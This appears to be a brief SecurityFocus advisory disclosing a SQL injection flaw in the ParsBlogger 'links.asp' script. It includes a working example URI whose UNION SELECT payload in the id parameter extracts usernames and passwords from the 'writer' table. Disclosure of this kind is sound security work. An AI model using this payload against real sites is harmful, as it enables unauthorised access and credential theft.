ParsBlogger 'links.asp' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/Script/links.asp?id=-6+union+select+1,2,3,4,5,6,7,concat(0x3e,username,password),9+from+writer--


 

Privacy Statement
Copyright 2010, SecurityFocus